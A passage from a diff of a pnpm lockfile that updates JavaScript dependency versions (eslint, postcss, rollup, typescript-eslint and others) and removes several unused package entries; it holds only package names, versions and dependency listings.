+
+  eslint@9.39.5(jiti@2.6.1):
     dependencies:
-      '@eslint-community/eslint-utils': 4.9.0(eslint@9.38.0(jiti@2.6.1))
-      '@eslint-community/regexpp': 4.12.1
-      '@eslint/config-array': 0.21.1
-      '@eslint/config-helpers': 0.4.1
-      '@eslint/core': 0.16.0
-      '@eslint/eslintrc': 3.3.1
-      '@eslint/js': 9.38.0
-      '@eslint/plugin-kit': 0.4.0
+      '@eslint-community/eslint-utils': 4.9.1(eslint@9.39.5(jiti@2.6.1))
+      '@eslint-community/regexpp': 4.12.2
+      '@eslint/config-array': 0.21.2
+      '@eslint/config-helpers': 0.4.2
+      '@eslint/core': 0.17.0
+      '@eslint/eslintrc': 3.3.6
+      '@eslint/js': 9.39.5
+      '@eslint/plugin-kit': 0.4.1
       '@humanfs/node': 0.16.6
       '@humanwhocodes/module-importer': 1.0.1
       '@humanwhocodes/retry': 0.4.3
-      '@types/estree': 1.0.6
-      ajv: 6.12.6
+      '@types/estree': 1.0.9
+      ajv: 6.15.0
       chalk: 4.1.2
       cross-spawn: 7.0.6
-      debug: 4.4.0
+      debug: 4.4.3
       escape-string-regexp: 4.0.0
       eslint-scope: 8.4.0
       eslint-visitor-keys: 4.2.1
       espree: 10.4.0
-      esquery: 1.6.0
+      esquery: 1.7.0
       esutils: 2.0.3
       fast-deep-equal: 3.1.3
       file-entry-cache: 8.0.0
@@ -5062,7 +4383,7 @@ snapshots:
       is-glob: 4.0.3
       json-stable-stringify-without-jsonify: 1.0.1
       lodash.merge: 4.6.2
-      minimatch: 3.1.2
+      minimatch: 3.1.5
       natural-compare: 1.4.0
       optionator: 0.9.4
     optionalDependencies:
@@ -5072,13 +4393,13 @@ snapshots:
 
   espree@10.4.0:
     dependencies:
-      acorn: 8.15.0
-      acorn-jsx: 5.3.2(acorn@8.15.0)
+      acorn: 8.17.0
+      acorn-jsx: 5.3.2(acorn@8.17.0)
       eslint-visitor-keys: 4.2.1
 
   esprima@4.0.1: {}
 
-  esquery@1.6.0:
+  esquery@1.7.0:
     dependencies:
       estraverse: 5.3.0
 
@@ -5092,13 +4413,15 @@ snapshots:
 
   estree-walker@3.0.3:
     dependencies:
-      '@types/estree': 1.0.6
+      '@types/estree': 1.0.8
 
   esutils@2.0.3: {}
 
-  expect-type@1.2.2: {}
+  expect-type@1.4.0: {}
 
   exsolve@1.0.7: {}
+
+  exsolve@1.1.0: {}
 
   extendable-error@0.1.7: {}
 
@@ -5118,19 +4441,25 @@ snapshots:
 
   fast-levenshtein@2.0.6: {}
 
+  fast-string-truncated-width@3.0.3: {}
+
+  fast-string-width@3.0.2:
+    dependencies:
+      fast-string-truncated-width: 3.0.3
+
+  fast-wrap-ansi@0.2.2:
+    dependencies:
+      fast-string-width: 3.0.2
+
   fastest-levenshtein@1.0.16: {}
 
   fastq@1.19.0:
     dependencies:
       reusify: 1.0.4
 
-  fdir@6.4.3(picomatch@4.0.2):
+  fdir@6.5.0(picomatch@4.0.5):
     optionalDependencies:
-      picomatch: 4.0.2
-
-  fdir@6.5.0(picomatch@4.0.3):
-    optionalDependencies:
-      picomatch: 4.0.3
+      picomatch: 4.0.5
 
   file-entry-cache@8.0.0:
     dependencies:
@@ -5139,8 +4468,6 @@ snapshots:
   fill-range@7.1.1:
     dependencies:
       to-regex-range: 5.0.1
-
-  filter-obj@5.1.0: {}
 
   find-up-simple@1.0.1: {}
 
@@ -5158,19 +4485,14 @@ snapshots:
     dependencies:
       magic-string: 0.30.17
       mlly: 1.7.4
-      rollup: 4.52.5
+      rollup: 4.62.2
 
   flat-cache@4.0.1:
     dependencies:
-      flatted: 3.3.2
+      flatted: 3.4.2
       keyv: 4.5.4
 
-  flatted@3.3.2: {}
-
-  foreground-child@3.3.0:
-    dependencies:
-      cross-spawn: 7.0.6
-      signal-exit: 4.1.0
+  flatted@3.4.2: {}
 
   fraction.js@4.3.7: {}
 
@@ -5197,10 +4519,12 @@ snapshots:
     dependencies:
       citty: 0.1.6
       consola: 3.4.0
-      defu: 6.1.4
+      defu: 6.1.7
       node-fetch-native: 1.6.6
       nypm: 0.6.2
       pathe: 2.0.3
+
+  giget@3.3.0: {}
 
   glob-parent@5.1.2:
     dependencies:
@@ -5213,15 +4537,6 @@ snapshots:
   glob-to-regex.js@1.2.0(tslib@2.8.1):
     dependencies:
       tslib: 2.8.1
-
-  glob@10.4.5:
-    dependencies:
-      foreground-child: 3.3.0
-      jackspeak: 3.4.3
-      minimatch: 9.0.5
-      minipass: 7.1.2
-      package-json-from-dist: 1.0.1
-      path-scurry: 1.11.1
 
   global-directory@4.0.1:
     dependencies:
@@ -5244,8 +4559,6 @@ snapshots:
 
   graceful-fs@4.2.11: {}
 
-  graphemer@1.4.0: {}
-
   has-flag@4.0.0: {}
 
   hasown@2.0.2:
@@ -5266,7 +4579,7 @@ snapshots:
 
   ignore@5.3.2: {}
 
-  ignore@7.0.3: {}
+  ignore@7.0.6: {}
 
   import-fresh@3.3.1:
     dependencies:
@@ -5327,15 +4640,13 @@ snapshots:
 
   is-reference@1.2.1:
     dependencies:
-      '@types/estree': 1.0.6
+      '@types/estree': 1.0.9
 
   is-subdir@1.2.0:
     dependencies:
       better-path-resolve: 1.0.0
 
   is-windows@1.0.2: {}
-
-  isbinaryfile@5.0.6: {}
 
   isexe@2.0.0: {}
 
@@ -5349,24 +4660,10 @@ snapshots:
       make-dir: 4.0.0
       supports-color: 7.2.0
 
-  istanbul-lib-source-maps@5.0.6:
-    dependencies:
-      '@jridgewell/trace-mapping': 0.3.25
-      debug: 4.4.3
-      istanbul-lib-coverage: 3.2.2
-    transitivePeerDependencies:
-      - supports-color
-
-  istanbul-reports@3.1.7:
+  istanbul-reports@3.2.0:
     dependencies:
       html-escaper: 2.0.2
       istanbul-lib-report: 3.0.1
-
-  jackspeak@3.4.3:
-    dependencies:
-      '@isaacs/cliui': 8.0.2
-    optionalDependencies:
-      '@pkgjs/parseargs': 0.11.0
 
   jiti@1.21.7: {}
 
@@ -5374,17 +4671,17 @@ snapshots:
 
   jiti@2.6.1: {}
 
+  js-tokens@10.0.0: {}
+
   js-tokens@4.0.0:
     optional: true
 
-  js-tokens@9.0.1: {}
-
-  js-yaml@3.14.1:
+  js-yaml@3.15.0:
     dependencies:
       argparse: 1.0.10
       esprima: 4.0.1
 
-  js-yaml@4.1.0:
+  js-yaml@4.3.0:
     dependencies:
       argparse: 2.0.1
 
@@ -5482,29 +4779,23 @@ snapshots:
 
   lodash.uniq@4.5.0: {}
 
-  loupe@3.1.3: {}
-
-  loupe@3.2.1: {}
-
-  lru-cache@10.4.3: {}
-
   magic-string@0.30.17:
     dependencies:
       '@jridgewell/sourcemap-codec': 1.5.0
 
-  magic-string@0.30.19:
+  magic-string@0.30.21:
     dependencies:
       '@jridgewell/sourcemap-codec': 1.5.5
 
-  magicast@0.3.5:
+  magicast@0.5.3:
     dependencies:
-      '@babel/parser': 7.26.8
-      '@babel/types': 7.26.8
+      '@babel/parser': 7.29.7
+      '@babel/types': 7.29.7
       source-map-js: 1.2.1
 
   make-dir@4.0.0:
     dependencies:
-      semver: 7.7.2
+      semver: 7.8.5
 
   md4w@0.2.6: {}
 
@@ -5528,20 +4819,28 @@ snapshots:
 
   mdn-data@2.12.2: {}
 
-  memfs@4.49.0:
+  memfs@4.64.0(tslib@2.8.1):
     dependencies:
+      '@jsonjoy.com/fs-core': 4.64.0(tslib@2.8.1)
+      '@jsonjoy.com/fs-fsa': 4.64.0(tslib@2.8.1)
+      '@jsonjoy.com/fs-node': 4.64.0(tslib@2.8.1)
+      '@jsonjoy.com/fs-node-builtins': 4.64.0(tslib@2.8.1)
+      '@jsonjoy.com/fs-node-to-fsa': 4.64.0(tslib@2.8.1)
+      '@jsonjoy.com/fs-node-utils': 4.64.0(tslib@2.8.1)
+      '@jsonjoy.com/fs-print': 4.64.0(tslib@2.8.1)
+      '@jsonjoy.com/fs-snapshot': 4.64.0(tslib@2.8.1)
       '@jsonjoy.com/json-pack': 1.21.0(tslib@2.8.1)
       '@jsonjoy.com/util': 1.9.0(tslib@2.8.1)
       glob-to-regex.js: 1.2.0(tslib@2.8.1)
       thingies: 2.5.0(tslib@2.8.1)
-      tree-dump: 1.0.3(tslib@2.8.1)
+      tree-dump: 1.1.0(tslib@2.8.1)
       tslib: 2.8.1
 
   merge2@1.4.1: {}
 
   micromark@2.11.4:
     dependencies:
-      debug: 4.4.0
+      debug: 4.4.3
       parse-entities: 2.0.0
     transitivePeerDependencies:
       - supports-color
@@ -5549,34 +4848,32 @@ snapshots:
   micromatch@4.0.8:
     dependencies:
       braces: 3.0.3
-      picomatch: 2.3.1
+      picomatch: 2.3.2
 
-  minimatch@3.1.2:
+  minimatch@10.2.5:
     dependencies:
-      brace-expansion: 1.1.11
+      brace-expansion: 5.0.7
 
-  minimatch@9.0.5:
+  minimatch@3.1.5:
     dependencies:
-      brace-expansion: 2.0.1
+      brace-expansion: 1.1.16
 
   minimist@1.2.8: {}
 
-  minipass@7.1.2: {}
-
   mkdist@2.4.1(typescript@5.9.3):
     dependencies:
-      autoprefixer: 10.4.21(postcss@8.5.6)
+      autoprefixer: 10.4.21(postcss@8.5.21)
       citty: 0.1.6
-      cssnano: 7.1.1(postcss@8.5.6)
-      defu: 6.1.4
+      cssnano: 7.1.1(postcss@8.5.21)
+      defu: 6.1.7
       esbuild: 0.25.11
       jiti: 1.21.7
       mlly: 1.8.0
       pathe: 2.0.3
       pkg-types: 2.3.0
-      postcss: 8.5.6
-      postcss-nested: 7.0.2(postcss@8.5.6)
-      semver: 7.7.2
+      postcss: 8.5.21
+      postcss-nested: 7.0.2(postcss@8.5.21)
+      semver: 7.8.5
       tinyglobby: 0.2.15
     optionalDependencies:
       typescript: 5.9.3
@@ -5601,15 +4898,15 @@ snapshots:
 
   ms@2.1.3: {}
 
-  nanoid@3.3.11: {}
-
-  nanoid@3.3.8: {}
+  nanoid@3.3.16: {}
 
   natural-compare@1.4.0: {}
 
   node-addon-api@7.1.1: {}
 
   node-fetch-native@1.6.6: {}
+
+  node-fetch-native@1.6.7: {}
 
   node-fetch@2.7.0:
     dependencies:
@@ -5633,17 +4930,15 @@ snapshots:
       pkg-types: 2.3.0
       tinyexec: 1.0.1
 
-  ofetch@1.4.1:
+  obug@2.1.4: {}
+
+  ofetch@1.5.1:
     dependencies:
       destr: 2.0.5
-      node-fetch-native: 1.6.6
-      ufo: 1.5.4
+      node-fetch-native: 1.6.7
+      ufo: 1.6.1
 
   ohash@2.0.11: {}
-
-  once@1.4.0:
-    dependencies:
-      wrappy: 1.0.2
 
   optionator@0.9.4:
     dependencies:
@@ -5680,14 +4975,12 @@ snapshots:
 
   p-try@2.2.0: {}
 
-  package-json-from-dist@1.0.1: {}
-
   package-json@10.0.1:
     dependencies:
       ky: 1.8.1
       registry-auth-token: 5.1.0
       registry-url: 6.0.1
-      semver: 7.7.2
+      semver: 7.8.5
 
   package-manager-detector@0.2.11:
     dependencies:
@@ -5714,41 +5007,23 @@ snapshots:
 
   path-parse@1.0.7: {}
 
-  path-scurry@1.11.1:
-    dependencies:
-      lru-cache: 10.4.3
-      minipass: 7.1.2
-
   path-type@4.0.0: {}
 
   pathe@2.0.2: {}
 
   pathe@2.0.3: {}
 
-  pathval@2.0.0: {}
-
-  perfect-debounce@2.0.0: {}
+  perfect-debounce@2.1.0: {}
 
   picocolors@1.1.1: {}
 
-  picomatch@2.3.1: {}
+  picomatch@2.3.2: {}
 
-  picomatch@4.0.2: {}
-
-  picomatch@4.0.3: {}
+  picomatch@4.0.5: {}
 
   pify@4.0.1: {}
 
-  pkg-pr-new@0.0.59:
-    dependencies:
-      '@actions/core': 1.11.1
-      '@jsdevtools/ez-spawn': 3.0.4
-      '@octokit/action': 6.1.0
-      ignore: 5.3.2
-      isbinaryfile: 5.0.6
-      pkg-types: 1.3.1
-      query-registry: 3.0.1
-      tinyglobby: 0.2.10
+  pkg-pr-new@0.0.79: {}
 
   pkg-types@1.3.1:
     dependencies:
@@ -5764,147 +5039,147 @@ snapshots:
 
   pluralize@8.0.0: {}
 
-  postcss-calc@10.1.1(postcss@8.5.6):
+  postcss-calc@10.1.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-selector-parser: 7.1.0
       postcss-value-parser: 4.2.0
 
-  postcss-colormin@7.0.4(postcss@8.5.6):
+  postcss-colormin@7.0.4(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
       caniuse-api: 3.0.0
       colord: 2.9.3
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-convert-values@7.0.7(postcss@8.5.6):
+  postcss-convert-values@7.0.7(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-discard-comments@7.0.4(postcss@8.5.6):
+  postcss-discard-comments@7.0.4(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-selector-parser: 7.1.0
 
-  postcss-discard-duplicates@7.0.2(postcss@8.5.6):
+  postcss-discard-duplicates@7.0.2(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
 
-  postcss-discard-empty@7.0.1(postcss@8.5.6):
+  postcss-discard-empty@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
 
-  postcss-discard-overridden@7.0.1(postcss@8.5.6):
+  postcss-discard-overridden@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
 
-  postcss-merge-longhand@7.0.5(postcss@8.5.6):
+  postcss-merge-longhand@7.0.5(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
-      stylehacks: 7.0.6(postcss@8.5.6)
+      stylehacks: 7.0.6(postcss@8.5.21)
 
-  postcss-merge-rules@7.0.6(postcss@8.5.6):
+  postcss-merge-rules@7.0.6(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
       caniuse-api: 3.0.0
-      cssnano-utils: 5.0.1(postcss@8.5.6)
-      postcss: 8.5.6
+      cssnano-utils: 5.0.1(postcss@8.5.21)
+      postcss: 8.5.21
       postcss-selector-parser: 7.1.0
 
-  postcss-minify-font-values@7.0.1(postcss@8.5.6):
+  postcss-minify-font-values@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-minify-gradients@7.0.1(postcss@8.5.6):
+  postcss-minify-gradients@7.0.1(postcss@8.5.21):
     dependencies:
       colord: 2.9.3
-      cssnano-utils: 5.0.1(postcss@8.5.6)
-      postcss: 8.5.6
+      cssnano-utils: 5.0.1(postcss@8.5.21)
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-minify-params@7.0.4(postcss@8.5.6):
+  postcss-minify-params@7.0.4(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
-      cssnano-utils: 5.0.1(postcss@8.5.6)
-      postcss: 8.5.6
+      cssnano-utils: 5.0.1(postcss@8.5.21)
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-minify-selectors@7.0.5(postcss@8.5.6):
+  postcss-minify-selectors@7.0.5(postcss@8.5.21):
     dependencies:
       cssesc: 3.0.0
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-selector-parser: 7.1.0
 
-  postcss-nested@7.0.2(postcss@8.5.6):
+  postcss-nested@7.0.2(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-selector-parser: 7.1.0
 
-  postcss-normalize-charset@7.0.1(postcss@8.5.6):
+  postcss-normalize-charset@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
 
-  postcss-normalize-display-values@7.0.1(postcss@8.5.6):
+  postcss-normalize-display-values@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-normalize-positions@7.0.1(postcss@8.5.6):
+  postcss-normalize-positions@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-normalize-repeat-style@7.0.1(postcss@8.5.6):
+  postcss-normalize-repeat-style@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-normalize-string@7.0.1(postcss@8.5.6):
+  postcss-normalize-string@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-normalize-timing-functions@7.0.1(postcss@8.5.6):
+  postcss-normalize-timing-functions@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-normalize-unicode@7.0.4(postcss@8.5.6):
+  postcss-normalize-unicode@7.0.4(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-normalize-url@7.0.1(postcss@8.5.6):
+  postcss-normalize-url@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-normalize-whitespace@7.0.1(postcss@8.5.6):
+  postcss-normalize-whitespace@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-ordered-values@7.0.2(postcss@8.5.6):
+  postcss-ordered-values@7.0.2(postcss@8.5.21):
     dependencies:
-      cssnano-utils: 5.0.1(postcss@8.5.6)
-      postcss: 8.5.6
+      cssnano-utils: 5.0.1(postcss@8.5.21)
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
-  postcss-reduce-initial@7.0.4(postcss@8.5.6):
+  postcss-reduce-initial@7.0.4(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
       caniuse-api: 3.0.0
-      postcss: 8.5.6
+      postcss: 8.5.21
 
-  postcss-reduce-transforms@7.0.1(postcss@8.5.6):
+  postcss-reduce-transforms@7.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
   postcss-selector-parser@7.1.0:
@@ -5912,40 +5187,34 @@ snapshots:
       cssesc: 3.0.0
       util-deprecate: 1.0.2
 
-  postcss-svgo@7.1.0(postcss@8.5.6):
+  postcss-svgo@7.1.0(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
-      svgo: 4.0.0
+      svgo: 4.0.2
 
-  postcss-unique-selectors@7.0.4(postcss@8.5.6):
+  postcss-unique-selectors@7.0.4(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-selector-parser: 7.1.0
 
   postcss-value-parser@4.2.0: {}
 
-  postcss@8.5.1:
+  postcss@8.5.21:
     dependencies:
-      nanoid: 3.3.8
-      picocolors: 1.1.1
-      source-map-js: 1.2.1
-
-  postcss@8.5.6:
-    dependencies:
-      nanoid: 3.3.11
+      nanoid: 3.3.16
       picocolors: 1.1.1
       source-map-js: 1.2.1
 
   prelude-ls@1.2.1: {}
 
-  prettier-linter-helpers@1.0.0:
+  prettier-linter-helpers@1.0.1:
     dependencies:
       fast-diff: 1.3.0
 
   prettier@2.8.8: {}
 
-  prettier@3.6.2: {}
+  prettier@3.9.6: {}
 
   pretty-bytes@7.1.0: {}
 
@@ -5966,28 +5235,11 @@ snapshots:
 
   quansync@0.2.10: {}
 
-  query-registry@3.0.1:
-    dependencies:
-      query-string: 9.3.1
-      quick-lru: 7.3.0
-      url-join: 5.0.0
-      validate-npm-package-name: 5.0.1
-      zod: 3.24.1
-      zod-package-json: 1.2.0
-
-  query-string@9.3.1:
-    dependencies:
-      decode-uri-component: 0.4.1
-      filter-obj: 5.1.0
-      split-on-first: 3.0.0
-
   queue-microtask@1.2.3: {}
 
-  quick-lru@7.3.0: {}
-
-  rc9@2.1.2:
+  rc9@3.0.1:
     dependencies:
-      defu: 6.1.4
+      defu: 6.1.7
       destr: 2.0.5
 
   rc@1.2.8:
@@ -6000,11 +5252,11 @@ snapshots:
   read-yaml-file@1.1.0:
     dependencies:
       graceful-fs: 4.2.11
-      js-yaml: 3.14.1
+      js-yaml: 3.15.0
       pify: 4.0.1
       strip-bom: 3.0.0
 
-  readdirp@4.1.1: {}
+  readdirp@5.0.0: {}
 
   regenerator-runtime@0.14.1: {}
 
@@ -6034,65 +5286,43 @@ snapshots:
 
   reusify@1.0.4: {}
 
-  rollup-plugin-dts@6.2.3(rollup@4.52.5)(typescript@5.9.3):
+  rollup-plugin-dts@6.2.3(rollup@4.62.2)(typescript@5.9.3):
     dependencies:
       magic-string: 0.30.17
-      rollup: 4.52.5
+      rollup: 4.62.2
       typescript: 5.9.3
     optionalDependencies:
       '@babel/code-frame': 7.27.1
 
-  rollup@4.34.6:
+  rollup@4.62.2:
     dependencies:
-      '@types/estree': 1.0.6
+      '@types/estree': 1.0.9
     optionalDependencies:
-      '@rollup/rollup-android-arm-eabi': 4.34.6
-      '@rollup/rollup-android-arm64': 4.34.6
-      '@rollup/rollup-darwin-arm64': 4.34.6
-      '@rollup/rollup-darwin-x64': 4.34.6
-      '@rollup/rollup-freebsd-arm64': 4.34.6
-      '@rollup/rollup-freebsd-x64': 4.34.6
-      '@rollup/rollup-linux-arm-gnueabihf': 4.34.6
-      '@rollup/rollup-linux-arm-musleabihf': 4.34.6
-      '@rollup/rollup-linux-arm64-gnu': 4.34.6
-      '@rollup/rollup-linux-arm64-musl': 4.34.6
-      '@rollup/rollup-linux-loongarch64-gnu': 4.34.6
-      '@rollup/rollup-linux-powerpc64le-gnu': 4.34.6
-      '@rollup/rollup-linux-riscv64-gnu': 4.34.6
-      '@rollup/rollup-linux-s390x-gnu': 4.34.6
-      '@rollup/rollup-linux-x64-gnu': 4.34.6
-      '@rollup/rollup-linux-x64-musl': 4.34.6
-      '@rollup/rollup-win32-arm64-msvc': 4.34.6
-      '@rollup/rollup-win32-ia32-msvc': 4.34.6
-      '@rollup/rollup-win32-x64-msvc': 4.34.6
-      fsevents: 2.3.3
-
-  rollup@4.52.5:
-    dependencies:
-      '@types/estree': 1.0.8
-    optionalDependencies:
-      '@rollup/rollup-android-arm-eabi': 4.52.5
-      '@rollup/rollup-android-arm64': 4.52.5
-      '@rollup/rollup-darwin-arm64': 4.52.5
-      '@rollup/rollup-darwin-x64': 4.52.5
-      '@rollup/rollup-freebsd-arm64': 4.52.5
-      '@rollup/rollup-freebsd-x64': 4.52.5
-      '@rollup/rollup-linux-arm-gnueabihf': 4.52.5
-      '@rollup/rollup-linux-arm-musleabihf': 4.52.5
-      '@rollup/rollup-linux-arm64-gnu': 4.52.5
-      '@rollup/rollup-linux-arm64-musl': 4.52.5
-      '@rollup/rollup-linux-loong64-gnu': 4.52.5
-      '@rollup/rollup-linux-ppc64-gnu': 4.52.5
-      '@rollup/rollup-linux-riscv64-gnu': 4.52.5
-      '@rollup/rollup-linux-riscv64-musl': 4.52.5
-      '@rollup/rollup-linux-s390x-gnu': 4.52.5
-      '@rollup/rollup-linux-x64-gnu': 4.52.5
-      '@rollup/rollup-linux-x64-musl': 4.52.5
-      '@rollup/rollup-openharmony-arm64': 4.52.5
-      '@rollup/rollup-win32-arm64-msvc': 4.52.5
-      '@rollup/rollup-win32-ia32-msvc': 4.52.5
-      '@rollup/rollup-win32-x64-gnu': 4.52.5
-      '@rollup/rollup-win32-x64-msvc': 4.52.5
+      '@rollup/rollup-android-arm-eabi': 4.62.2
+      '@rollup/rollup-android-arm64': 4.62.2
+      '@rollup/rollup-darwin-arm64': 4.62.2
+      '@rollup/rollup-darwin-x64': 4.62.2
+      '@rollup/rollup-freebsd-arm64': 4.62.2
+      '@rollup/rollup-freebsd-x64': 4.62.2
+      '@rollup/rollup-linux-arm-gnueabihf': 4.62.2
+      '@rollup/rollup-linux-arm-musleabihf': 4.62.2
+      '@rollup/rollup-linux-arm64-gnu': 4.62.2
+      '@rollup/rollup-linux-arm64-musl': 4.62.2
+      '@rollup/rollup-linux-loong64-gnu': 4.62.2
+      '@rollup/rollup-linux-loong64-musl': 4.62.2
+      '@rollup/rollup-linux-ppc64-gnu': 4.62.2
+      '@rollup/rollup-linux-ppc64-musl': 4.62.2
+      '@rollup/rollup-linux-riscv64-gnu': 4.62.2
+      '@rollup/rollup-linux-riscv64-musl': 4.62.2
+      '@rollup/rollup-linux-s390x-gnu': 4.62.2
+      '@rollup/rollup-linux-x64-gnu': 4.62.2
+      '@rollup/rollup-linux-x64-musl': 4.62.2
+      '@rollup/rollup-openbsd-x64': 4.62.2
+      '@rollup/rollup-openharmony-arm64': 4.62.2
+      '@rollup/rollup-win32-arm64-msvc': 4.62.2
+      '@rollup/rollup-win32-ia32-msvc': 4.62.2
+      '@rollup/rollup-win32-x64-gnu': 4.62.2
+      '@rollup/rollup-win32-x64-msvc': 4.62.2
       fsevents: 2.3.3
 
   run-parallel@1.2.0:
@@ -6105,11 +5335,11 @@ snapshots:
 
   safer-buffer@2.1.2: {}
 
-  sax@1.4.1: {}
+  sax@1.6.0: {}
 
   scule@1.3.0: {}
 
-  semver@7.7.2: {}
+  semver@7.8.5: {}
 
   shebang-command@2.0.0:
     dependencies:
@@ -6132,15 +5362,11 @@ snapshots:
       cross-spawn: 7.0.6
       signal-exit: 4.1.0
 
-  split-on-first@3.0.0: {}
-
   sprintf-js@1.0.3: {}
 
   stackback@0.0.2: {}
 
-  std-env@3.10.0: {}
-
-  string-argv@0.3.2: {}
+  std-env@4.2.0: {}
 
   string-width@4.2.3:
     dependencies:
@@ -6176,16 +5402,12 @@ snapshots:
 
   strip-json-comments@3.1.1: {}
 
-  strip-literal@3.1.0:
-    dependencies:
-      js-tokens: 9.0.1
-
   stubborn-fs@1.2.5: {}
 
-  stylehacks@7.0.6(postcss@8.5.6):
+  stylehacks@7.0.6(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-selector-parser: 7.1.0
 
   supports-color@7.2.0:
@@ -6194,7 +5416,7 @@ snapshots:
 
   supports-preserve-symlinks-flag@1.0.0: {}
 
-  svgo@4.0.0:
+  svgo@4.0.2:
     dependencies:
       commander: 11.1.0
       css-select: 5.1.0
@@ -6202,19 +5424,13 @@ snapshots:
       css-what: 6.1.0
       csso: 5.0.5
       picocolors: 1.1.1
-      sax: 1.4.1
+      sax: 1.6.0
 
-  synckit@0.11.11:
+  synckit@0.11.13:
     dependencies:
-      '@pkgr/core': 0.2.9
+      '@pkgr/core': 0.3.6
 
   term-size@2.2.1: {}
-
-  test-exclude@7.0.1:
-    dependencies:
-      '@istanbuljs/schema': 0.1.3
-      glob: 10.4.5
-      minimatch: 9.0.5
 
   thingies@2.5.0(tslib@2.8.1):
     dependencies:
@@ -6222,25 +5438,16 @@ snapshots:
 
   tinybench@2.9.0: {}
 
-  tinyexec@0.3.2: {}
-
   tinyexec@1.0.1: {}
 
-  tinyglobby@0.2.10:
-    dependencies:
-      fdir: 6.4.3(picomatch@4.0.2)
-      picomatch: 4.0.2
+  tinyexec@1.2.4: {}
 
   tinyglobby@0.2.15:
     dependencies:
-      fdir: 6.5.0(picomatch@4.0.3)
-      picomatch: 4.0.3
+      fdir: 6.5.0(picomatch@4.0.5)
+      picomatch: 4.0.5
 
-  tinypool@1.1.1: {}
-
-  tinyrainbow@2.0.0: {}
-
-  tinyspy@4.0.4: {}
+  tinyrainbow@3.1.0: {}
 
   to-regex-range@5.0.1:
     dependencies:
@@ -6248,43 +5455,31 @@ snapshots:
 
   tr46@0.0.3: {}
 
-  tree-dump@1.0.3(tslib@2.8.1):
-    dependencies:
-      tslib: 2.8.1
-
   tree-dump@1.1.0(tslib@2.8.1):
     dependencies:
       tslib: 2.8.1
 
-  ts-api-utils@2.0.1(typescript@5.9.3):
-    dependencies:
-      typescript: 5.9.3
-
-  ts-api-utils@2.1.0(typescript@5.9.3):
+  ts-api-utils@2.5.0(typescript@5.9.3):
     dependencies:
       typescript: 5.9.3
 
   tslib@2.8.1: {}
 
-  tunnel@0.0.6: {}
-
   type-check@0.4.0:
     dependencies:
       prelude-ls: 1.2.1
-
-  type-detect@4.1.0: {}
 
   type-fest@2.19.0: {}
 
   type-fest@4.41.0: {}
 
-  typescript-eslint@8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3):
+  typescript-eslint@8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3):
     dependencies:
-      '@typescript-eslint/eslint-plugin': 8.46.2(@typescript-eslint/parser@8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3))(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      '@typescript-eslint/parser': 8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      '@typescript-eslint/typescript-estree': 8.46.2(typescript@5.9.3)
-      '@typescript-eslint/utils': 8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      eslint: 9.38.0(jiti@2.6.1)
+      '@typescript-eslint/eslint-plugin': 8.65.0(@typescript-eslint/parser@8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3))(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
